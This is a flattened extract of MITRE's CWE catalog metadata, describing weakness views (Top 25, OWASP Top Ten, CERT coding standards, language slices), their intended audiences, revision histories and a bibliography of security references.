Software Developers - By following the CWE Top 25, developers are able to significantly reduce the number of weaknesses that occur in their software. - - - Product Customers - Customers can use the weaknesses in this view in order to formulate independent evidence of a claim by a product vendor to have eliminated / mitigated the most dangerous weaknesses. - - - Educators - Educators can use this view to focus curriculum and teachings on the most dangerous weaknesses. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2020-08-20 - - - - - This view (slice) covers all the elements in CWE. - /Weakness_Catalog/*[not(self::External_References)]/* - - - CWE Content Team - MITRE - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated View_Structure - - - - - CWE nodes in this view (slice) have been deprecated. There should be a reference pointing to the replacement in each deprecated weakness. - /Weakness_Catalog/*/*[@Status='Deprecated'] - - - CWE Content Team - MITRE - 2007-05-07 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, View_Structure - - - CWE Content Team - MITRE - 2008-11-24 - updated Name, Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-08-28 - changed explicit member list to implicit filter - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships, View_Filter, View_Structure - - Deprecated - - - - CWE nodes in this view (graph) are associated with the OWASP Top Ten, as released in 2007. This view is considered obsolete as a newer version of the OWASP Top Ten is available. - - - Software Developers - This view outlines the most important issues as identified by the OWASP Top Ten (2007 version), providing a good starting point for web application developers who want to code more securely. - - - Product Customers - This view outlines the most important issues as identified by the OWASP Top Ten (2007 version), providing customers with a way of asking their software developers to follow minimum expectations for secure code. - - - Educators - Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. - - - - - - - - - - - - - - - - - - - The relationships in this view are a direct extraction of the CWE mappings that are in the 2007 OWASP document. CWE has changed since the release of that document. - - - - CWE Content Team - MITRE - 2007-10-01 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Name, Relationships, References, Relationship_Notes, View_Audience, View_Structure - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Description - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - Weaknesses in OWASP Top Ten - - - - This view has been deprecated. It was only used for an early year of the NIST SAMATE project, and it did not represent any official or commonly-utilized list. - - - CWE Content Team - MITRE - 2007-10-01 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, References, View_Structure - - - CWE Content Team - MITRE - 2012-05-11 - updated References - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, References, Relationships, Type - - Weaknesses Examined by SAMATE - - - - This view has been deprecated because it is not actively maintained and does not provide utility to stakeholders. It was originally created before CWE 1.0 as a simple example of how views could be structured within CWE. - - - CWE Content Team - MITRE - 2007-10-01 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, View_Structure - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationships, Type - - Resource-specific Weaknesses - - - - CWE nodes in this view (slice) were used by NIST to categorize vulnerabilities within NVD, from 2008 to 2016. This original version has been used by many other projects. - - - - - - - - - - - - - - - - - - - - - - - - - - - In Summer 2007, NIST began using this set of CWE elements to classify CVE entries within the National Vulnerability Database (NVD). The data was made publicly available beginning in 2008. In 2016, NIST began using a different list as derived from the "Weaknesses for Simplified Mapping of Published Vulnerabilities" view (CWE-1003). - - - - - CWE Content Team - MITRE - 2007-10-01 - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, References, View_Structure - - - CWE Content Team - MITRE - 2017-01-19 - updated Description, Maintenance_Notes - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Maintenance_Notes, Name - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - Weaknesses Used by NVD - - - - This view (slice) covers issues that are found in C programs that are not common to all languages. - /Weakness_Catalog/Weaknesses/Weakness[./Applicable_Platforms/Language/@Name='C'] - - - CWE Content Team - MITRE - 2008-04-11 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Name, View_Filter, View_Structure - - Weaknesses found in the C Language - - - - This view (slice) covers issues that are found in C++ programs that are not common to all languages. - /Weakness_Catalog/Weaknesses/Weakness[./Applicable_Platforms/Language/@Name='C++'] - - - CWE Content Team - MITRE - 2008-04-11 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Name, View_Filter, View_Structure - - Weaknesses found in the C++ Language - - - - This view (slice) covers issues that are found in Java programs that are not common to all languages. - /Weakness_Catalog/Weaknesses/Weakness[./Applicable_Platforms/Language/@Name='Java'] - - - CWE Content Team - MITRE - 2008-04-11 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Name, View_Filter, View_Structure - - Weaknesses found in the Java Language - - - - This view (slice) covers issues that are found in PHP programs that are not common to all languages. - /Weakness_Catalog/Weaknesses/Weakness[./Applicable_Platforms/Language/@Name='PHP'] - - - CWE Content Team - MITRE - 2008-04-11 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Name, View_Filter, View_Structure - - Weaknesses found in the PHP Language - - - - This view (slice) displays only weakness base elements. - /Weakness_Catalog/Weaknesses/Weakness[@Abstraction='Base'][not(@Status='Deprecated')] - - - CWE Content Team - MITRE - 2008-04-11 - - - CWE Content Team - MITRE - 2008-09-08 - updated View_Filter, View_Structure - - - CWE Content Team - MITRE - 2019-01-03 - updated View_Filter - - - - - This view displays only composite weaknesses. - /Weakness_Catalog/Weaknesses/Weakness[@Structure='Composite'][not(@Status='Deprecated')] - - - CWE Content Team - MITRE - 2008-04-11 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, View_Filter, View_Structure - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, View_Structure - - - CWE Content Team - MITRE - 2019-01-03 - updated View_Filter - - - - - This view has been deprecated. It has limited utility for stakeholders, since all weaknesses can be links in a chain. - /Weakness_Catalog[false()] - - - CWE Content Team - MITRE - 2008-04-11 - - - CWE Content Team - MITRE - 2008-09-08 - updated View_Filter, View_Structure - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Type, View_Filter - - Chain Elements - - - - This view organizes weaknesses around concepts that are frequently used or encountered in software development. This includes all aspects of the software development lifecycle including both architecture and implementation. Accordingly, this view can align closely with the perspectives of architects, developers, educators, and assessment vendors. It provides a variety of categories that are intended to simplify navigation, browsing, and mapping. - - - Software Developers - Software developers (including architects, designers, coders, and testers) use this view to better understand potential mistakes that can be made in specific areas of their software application. The use of concepts that developers are familiar with makes it easier to navigate this view, and filtering by Modes of Introduction can enable focus on a specific phase of the development lifecycle. - - - Educators - Educators use this view to teach future developers about the types of mistakes that are commonly made within specific parts of a codebase. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - The top level categories in this view represent commonly understood areas/terms within software development, and are meant to aid the user in identifying potential related weaknesses. It is possible for the same weakness to exist within multiple different categories. - This view attempts to present weaknesses in a simple and intuitive way. As such it targets a single level of abstraction. It is important to realize that not every CWE will be represented in this view. High-level class weaknesses and low-level variant weaknesses are mostly ignored. However, by exploring the weaknesses that are included, and following the defined relationships, one can find these higher and lower level weaknesses. - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2017-01-19 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Description, View_Audience - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Other_Notes, Relationships, View_Audience - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - Development Concepts - - - - This view (graph) organizes weaknesses using a hierarchical structure that is similar to that used by Seven Pernicious Kingdoms. - - - Software Developers - This view is useful for developers because it is organized around concepts with which developers are familiar, and it focuses on weaknesses that can be detected using source code analysis tools. - - - - - - - - - - - - - - - - - The MITRE CWE team frequently uses "7PK" as an abbreviation for Seven Pernicious Kingdoms. - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Alternate_Terms, Other_Notes - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - This view (slice) lists weaknesses that can be introduced during design. - /Weakness_Catalog/Weaknesses/Weakness[./Modes_Of_Introduction/Introduction/Phase='Architecture and Design'] - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-02-10 - Critical - Updated the View_Filter to reflect new structure in CWE Schema v4.2 - - - CWE Content Team - MITRE - 2009-03-10 - updated View_Filter - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - - - This view (slice) lists weaknesses that can be introduced during implementation. - /Weakness_Catalog/Weaknesses/Weakness[./Modes_Of_Introduction/Introduction/Phase='Implementation'] - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-02-10 - Critical - Updated the View_Filter to reflect new structure in CWE Schema v4.2 - - - CWE Content Team - MITRE - 2009-03-10 - updated View_Filter - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - - - This view displays Named Chains and their components. - /Weakness_Catalog/Weaknesses/Weakness[@Structure='Chain'] - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, View_Structure - - - - - CWE entries in this view (graph) are associated with the OWASP Top Ten, as released in 2004, and as required for compliance with PCI DSS version 1.1. This view is considered obsolete as a newer version of the OWASP Top Ten is available. - - - Software Developers - This view outlines the most important issues as identified by the OWASP Top Ten (2004 version), providing a good starting point for web application developers who want to code more securely, as well as complying with PCI DSS 1.1. - - - Product Customers - This view outlines the most important issues as identified by the OWASP Top Ten, providing customers with a way of asking their software developers to follow minimum expectations for secure code, in compliance with PCI-DSS 1.1. - - - Educators - Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. However, the 2007 version (CWE-629) might be more appropriate. - - - - - - - - - - - - - - - - - - - - CWE relationships for this view were obtained by examining the OWASP document and mapping to any items that were specifically mentioned within the text of a category. As a result, this mapping is not complete with respect to all of CWE. In addition, some concepts were mentioned in multiple Top Ten items, which caused them to be mapped to multiple CWE categories. For example, SQL injection is mentioned in both A1 (CWE-722) and A6 (CWE-727) categories. - As of 2008, some parts of CWE were not fully clarified out in terms of weaknesses. When these areas were mentioned in the OWASP Top Ten, category entries were mapped, although general mapping practice would usually favor mapping only to weaknesses. - - - - Veracode - 2008-08-15 - Suggested creation of view and provided mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Description - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Maintenance_Notes, Relationship_Notes - - - - - CWE entries in this view (graph) are fully or partially eliminated by following the guidance presented in the book "The CERT C Secure Coding Standard" published in 2008. This view is considered obsolete, as a newer version of the coding standard is available. This view statically represents the coding rules as they were in 2008. - - - Software Developers - By following the CERT C Secure Coding Standard, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. - - - Product Customers - If a software developer claims to be following the CERT C Secure Coding standard, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. - - - Educators - Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. - - - - - - - - - - - - - - - - - - - - - - - The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Maintenance_Notes, Name, References - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Maintenance_Notes - - Weaknesses Addressed by the CERT C Secure Coding Standard - Weaknesses Addressed by the CERT C Secure Coding Standard (2008 Version) - - - - CWE entries in this view (graph) are listed in the 2009 CWE/SANS Top 25 Programming Errors. This view is considered obsolete as a newer version of the Top 25 is available. - - - Software Developers - By following the Top 25, developers will be able to significantly reduce the number of weaknesses that occur in their software. - - - Product Customers - If a software developer claims to be following the Top 25, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. - - - Educators - Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could focus on the Top 25. - - - - - - - - - - - - - CWE Content Team - MITRE - 2009-01-12 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Description - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - - - CWE entries in this view (graph) are listed in the 2010 CWE/SANS Top 25 Programming Errors. This view is considered obsolete as a newer version of the Top 25 is available. - - - Software Developers - By following the Top 25, developers will be able to significantly reduce the number of weaknesses that occur in their software. - - - Product Customers - If a software developer claims to be following the Top 25, then customers can use the weaknesses in this view in order to formulate independent evidence of that claim. - - - Educators - Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could focus on the Top 25. - - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-01-15 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Description - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - - - CWE nodes in this view (graph) are associated with the OWASP Top Ten, as released in 2010. This view is considered obsolete as a newer version of the OWASP Top Ten is available. - - - Software Developers - This view outlines the most important issues as identified by the OWASP Top Ten (2010 version), providing a good starting point for web application developers who want to code more securely. - - - Product Customers - This view outlines the most important issues as identified by the OWASP Top Ten (2010 version), providing customers with a way of asking their software developers to follow minimum expectations for secure code. - - - Educators - Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. - - - - - - - - - - - - - - - - - - - The relationships in this view are a direct extraction of the CWE mappings that are in the 2010 OWASP document. CWE has changed since the release of that document. - - - - CWE Content Team - MITRE - 2010-06-17 - - - MITRE - 2013-07-16 - Updated Reference URL - - - CWE Content Team - MITRE - 2013-07-17 - updated References - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Description - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - - - CWE entries in this view (graph) are fully or partially eliminated by following the guidance presented in the book "The CERT Oracle Secure Coding Standard for Java" published in 2011. This view is considered obsolete as a newer version of the coding standard is available. - - - Software Developers - By following The CERT Oracle Secure Coding Standard for Java, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. - - - Product Customers - If a software developer claims to be following The CERT Oracle Secure Coding Standard for Java, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. - - - Educators - Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. - - - - - - - - - - - - - - - - - - - - - - - - - - The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References, View_Audience - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - Weaknesses Addressed by the CERT Java Secure Coding Standard - - - - CWE entries in this view (graph) are fully or partially eliminated by following the SEI CERT C++ Coding Standard, as published in 2016. This view is no longer being actively maintained, since it statically represents the coding rules as they were in 2016. - - - Software Developers - By following the CERT C++ Secure Coding Standard, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. - - - Product Customers - If a software developer claims to be following the CERT C++ Secure Coding Standard, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. - - - Educators - Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. - - - - - - - - - - - - - - - - - - - - - - - - The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. - - - - CWE Content Team - MITRE - 2011-08-04 - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Maintenance_Notes, Name, References - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Maintenance_Notes - - Weaknesses Addressed by the CERT C++ Secure Coding Standard - - - - This view contains a selection of weaknesses that represent the variety of weaknesses that are captured in CWE, at a level of abstraction that is likely to be useful to most audiences. It can be used by researchers to determine how broad their theories, models, or tools are. It will also be used by the CWE content team in 2012 to focus quality improvement efforts for individual CWE entries. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-12-15 - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - - - CWE identifiers in this view are associated with clusters of Software Fault Patterns (SFPs). - - - Applied Researchers - - - Academic Researchers - - - Product Vendors - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2020-02-24 - updated References, View_Audience - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - CWE entries in this view (graph) are listed in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors. - - - Software Developers - By following the Top 25, developers will be able to significantly reduce the number of weaknesses that occur in their software. - - - Product Customers - If a software developer claims to be following the Top 25, then customers can use the weaknesses in this view in order to formulate independent evidence of that claim. - - - Educators - Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could focus on the Top 25. - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-06-25 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - - - CWE entries in this view (slice) are often seen in mobile applications. - /Weakness_Catalog/Weaknesses/Weakness[./Applicable_Platforms/Technology/@Class='Mobile'] - - - CWE Content Team - MITRE - 2013-05-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Filter - - - - - CWE nodes in this view (graph) are associated with the OWASP Top Ten, as released in 2013. This view is considered obsolete as a newer version of the OWASP Top Ten is available. - - - Software Developers - This view outlines the most important issues as identified by the OWASP Top Ten (2013 version), providing a good starting point for web application developers who want to code more securely. - - - Product Customers - This view outlines the most important issues as identified by the OWASP Top Ten (2013 version), providing customers with a way of asking their software developers to follow minimum expectations for secure code. - - - Educators - Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. - - - - - - - - - - - - - - - - - - - The relationships in this view have been pulled directly from the 2013 OWASP Top 10 document, either from the explicit mapping section, or from weakness types alluded to in the written sections. - - - - CWE Content Team - MITRE - 2013-07-16 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - - - CWE identifiers in this view are weaknesses that do not have associated Software Fault Patterns (SFPs), as covered by the CWE-888 view. As such, they represent gaps in coverage by the current software fault pattern model. - - - Applied Researchers - - - Academic Researchers - - - Product Vendors - - - /Weakness_Catalog/Weaknesses/Weakness[not(./Taxonomy_Mappings/Taxonomy_Mapping/@Taxonomy_Name='Software Fault Patterns')][not(@Status='Deprecated')] - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2019-01-03 - updated View_Filter - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - - - - - NIST - CWE - Common Weakness Enumeration - http://nvd.nist.gov/cwe.cfm - - - OWASP - HttpOnly - https://www.owasp.org/index.php/HttpOnly - - - Michael Howard - Some Bad News and Some Good News - 2002 - https://msdn.microsoft.com/en-us/library/ms972826.aspx - - - Troy Hunt - C is for cookie, H is for hacker - understanding HTTP only and Secure cookies - 2013 - --03 - ---26 - https://www.troyhunt.com/c-is-for-cookie-h-is-for-hacker/ - - - Microsoft - Mitigating Cross-site Scripting With HTTP-only Cookies - https://msdn.microsoft.com/en-us/library/ms533046.aspx - - - Katrina Tsipenyuk - Brian Chess - Gary McGraw - Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors - NIST Workshop on Software Security Assurance Tools Techniques and Metrics - 2005 - --11 - ---07 - NIST - https://samate.nist.gov/SSATTM_Content/papers/Seven%20Pernicious%20Kingdoms%20-%20Taxonomy%20of%20Sw%20Security%20Errors%20-%20Tsipenyuk%20-%20Chess%20-%20McGraw.pdf - - - Michael Howard - David LeBlanc - Writing Secure Code - 2nd Edition - 2002 - --12 - ---04 - Microsoft Press - https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223 - - - Gregory Baatard - Peter Hannay - The 2011 IDN Homograph Attack Mitigation Survey - 2012 - ECU Publications - http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1174&context=ecuworks2012 - - - Santos, J. C. S. - Tarrit, K. - Mirakhorli, M. - A Catalog of Security Architecture Weaknesses. - 2017 IEEE International Conference on Software Architecture (ICSA) - 2017 - https://design.se.rit.edu/papers/cawe-paper.pdf - - - Santos, J. C. S. - Peruma, A. - Mirakhorli, M. - Galster, M. - Sejfia, A. - Understanding Software Vulnerabilities Related to Architectural Security Tactics: An Empirical Investigation of Chromium, PHP and Thunderbird. - 2017 IEEE International Conference on Software Architecture (ICSA) - 2017 - https://design.se.rit.edu/papers/TacticalVulnerabilities.pdf - - - Paul Kocher - Daniel Genkin - Daniel Gruss - Werner Haas - Mike Hamburg - Moritz Lipp - Stefan Mangard - Thomas Prescher - Michael Schwarz - Yuval Yarom - Spectre Attacks: Exploiting Speculative Execution - 2018 - --01 - ---03 - https://arxiv.org/abs/1801.01203 - - - Moritz Lipp - Michael Schwarz - Daniel Gruss - Thomas Prescher - Werner Haas - Stefan Mangard - Paul Kocher - Daniel Genkin - Yuval Yarom - Mike Hamburg - Meltdown - 2018 - --01 - ---03 - https://arxiv.org/abs/1801.01207 - - - Xuejing Yuan - Yuxuan Chen - Yue Zhao - Yunhui Long - Xiaokang Liu - Kai Chen - Shengzhi Zhang - Heqing Huang - Xiaofeng Wang - Carl A. Gunter - CommanderSong: A Systematic Approach for Practical Adversarial Voice Recognition - 2018 - --01 - ---24 - https://arxiv.org/pdf/1801.08535.pdf - - - Nicholas Carlini - David Wagner - Audio Adversarial Examples: Targeted Attacks on Speech-to-Text - 2018 - --01 - ---05 - https://arxiv.org/abs/1801.01944 - - - James Vincent - Magic AI: These are the Optical Illusions that Trick, Fool, and Flummox Computers - 2017 - --04 - ---12 - The Verge - https://www.theverge.com/2017/4/12/15271874/ai-adversarial-images-fooling-attacks-artificial-intelligence - - - Christian Szegedy - Wojciech Zaremba - Ilya Sutskever - Joan Bruna - Dumitru Erhan - Ian Goodfellow - Rob Fergus - Intriguing properties of neural networks - 2014 - --02 - ---19 - https://arxiv.org/abs/1312.6199 - - - OpenAI - Attacking Machine Learning with Adversarial Examples - 2017 - --02 - ---24 - https://blog.openai.com/adversarial-example-research/ - - - Secure Software, Inc. - The CLASP Application Security Process - 2005 - https://cwe.mitre.org/documents/sources/TheCLASPApplicationSecurityProcess.pdf - - - Nikolai Mansourov - Djenana Campara - System Assurance - 2010 - --12 - ---06 - https://www.elsevier.com/books/system-assurance/mansourov/978-0-12-381414-2 - - - Ben Calloni - Nikolai Mansourov - Djenana Campara - Task Order 0006: Vulnerability Path Analysis and Demonstration (VPAD). Volume 2 - White Box Definitions of Software Fault Patterns - 2011 - --12 - https://apps.dtic.mil/docs/citations/ADB381215 - - - OWASP - CSV Injection - 2020 - --02 - ---02 - https://owasp.org/www-community/attacks/CSV_Injection - - - Jamie Rougvie - Data Extraction to Command Execution CSV Injection - 2019 - --09 - ---06 - https://www.veracode.com/blog/secure-development/data-extraction-command-execution-csv-injection - - - George Mauer - The Absurdly Underestimated Dangers of CSV Injection - 2017 - --10 - ---07 - http://georgemauer.net/2017/10/07/csv-injection.html - - - James Kettle - Comma Separated Vulnerabilities - 2014 - --08 - ---29 - https://www.contextis.com/en/blog/comma-separated-vulnerabilities - - - Andrew Horton - Clickjacking For Shells - https://www.exploit-db.com/docs/17881.pdf - - - OWASP - Clickjacking - OWASP - https://www.owasp.org/index.php/Clickjacking - - - Internet Security - SecTheory - http://www.sectheory.com/clickjacking.html - - - W3C - Content Security Policy Level 3 - https://w3c.github.io/webappsec-csp/ - - - Alex Yumashev - Target="_blank" - the most underestimated vulnerability ever - 2016 - --05 - ---04 - https://medium.com/@jitbit/target-blank-the-most-underestimated-vulnerability-ever-96e328301f4c - - - Ben Halpern - The target="_blank" vulnerability by example - 2016 - --09 - ---11 - https://dev.to/ben/the-targetblank-vulnerability-by-example - - - Fortify Software - Fortify Descriptions - http://vulncat.fortifysoftware.com - - - Beth Stearns - The Java(TM) Tutorial: The Java Native Interface - 2005 - Sun Microsystems - http://www.eg.bucknell.edu/~mead/Java-tutorial/native1.1/index.html - - - OWASP - OWASP TOP 10 - http://www.owasp.org/index.php/Top_10_2007 - - - Michael Howard - David LeBlanc - John Viega - 24 Deadly Sins of Software Security - McGraw-Hill - 2010 - - - OWASP - OWASP Enterprise Security API (ESAPI) Project - http://www.owasp.org/index.php/ESAPI - - - Joshbw - Output Sanitization - 2008 - --09 - ---18 - http://www.analyticalengine.net/archives/58 - - - Niyaz PK - Sanitizing user data: How and where to do it - 2008 - --09 - ---11 - http://www.diovo.com/2008/09/sanitizing-user-data-how-and-where-to-do-it/ - - - Jeremiah Grossman - Input validation or output filtering, which is better? - 2007 - --01 - ---30 - http://jeremiahgrossman.blogspot.com/2007/01/input-validation-or-output-filtering.html - - - Jim Manico - Input Validation - Not That Important - 2008 - --08 - ---10 - http://manicode.blogspot.com/2008/08/input-validation-not-that-important.html - - - Michael Eddington - Preventing XSS with Correct Output Encoding - http://phed.org/2008/05/19/preventing-xss-with-correct-output-encoding/ - - - Greg Hoglund - Gary McGraw - Exploiting Software: How to Break Code - 2004 - --02 - ---27 - Addison-Wesley - http://www.exploitingsoftware.com/ - - - Alec Muffet - The night the log was forged - http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm - - - Microsoft - Using the Strsafe.h Functions - http://msdn.microsoft.com/en-us/library/ms647466.aspx - - - Matt Messier - John Viega - Safe C String Library v1.0.3 - http://www.zork.org/safestr/ - - - Michael Howard - Address Space Layout Randomization in Windows Vista - http://blogs.msdn.com/michael_howard/archive/2006/05/26/address-space-layout-randomization-in-windows-vista.aspx - - - Arjan van de Ven - Limiting buffer overflows with ExecShield - http://www.redhat.com/magazine/009jul05/features/execshield/ - - - PaX - http://en.wikipedia.org/wiki/PaX - - - Microsoft - Understanding DEP as a mitigation technology part 1 - http://blogs.technet.com/b/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-1.aspx - - - Mark Dowd - John McDonald - Justin Schuh - The Art of Software Security Assessment - 1st Edition - 2006 - Addison Wesley - - - Grant Murphy - Position Independent Executables (PIE) - 2012 - --11 - ---28 - Red Hat - https://securityblog.redhat.com/2012/11/28/position-independent-executables-pie/ - - - M. Howard - D. LeBlanc - J. Viega - 19 Deadly Sins of Software Security - 2005 - --07 - ---26 - McGraw-Hill/Osborne - - - OWASP, Fortify Software - ASP.NET Misconfiguration: Missing Custom Error Handling - http://www.owasp.org/index.php/ASP.NET_Misconfiguration:_Missing_Custom_Error_Handling - - - Jason Lam - Top 25 Series - Rank 3 - Classic Buffer Overflow - 2010 - --03 - ---02 - SANS Software Security Institute - http://software-security.sans.org/blog/2010/03/02/top-25-series-rank-3-classic-buffer-overflow/ - - - Sean Barnum - Michael Gegick - Least Privilege - 2005 - --09 - ---14 - https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html - - - Buffer UNDERFLOWS: What do you know about it? - Vuln-Dev Mailing List - 2004 - --01 - ---10 - http://seclists.org/vuln-dev/2004/Jan/0022.html - - - Jason Lam - Top 25 Series - Rank 14 - Improper Validation of Array Index - 2010 - --03 - ---12 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/12/top-25-series-rank-14-improper-validation-of-array-index/ - - - Microsoft Corporation - How To: Encrypt Configuration Sections in ASP.NET 2.0 Using DPAPI - http://msdn.microsoft.com/en-us/library/ms998280.aspx - - - Microsoft Corporation - How To: Encrypt Configuration Sections in ASP.NET 2.0 Using RSA - http://msdn.microsoft.com/en-us/library/ms998283.aspx - - - Microsoft Corporation - .NET Framework Developer's Guide - Securing Connection Strings - http://msdn.microsoft.com/en-us/library/89211k9b(VS.80).aspx - - - David LeBlanc - Niels Dekker - SafeInt - http://safeint.codeplex.com/ - - - Jason Lam - Top 25 Series - Rank 18 - Incorrect Calculation of Buffer Size - 2010 - --03 - ---19 - SANS Software Security Institute - 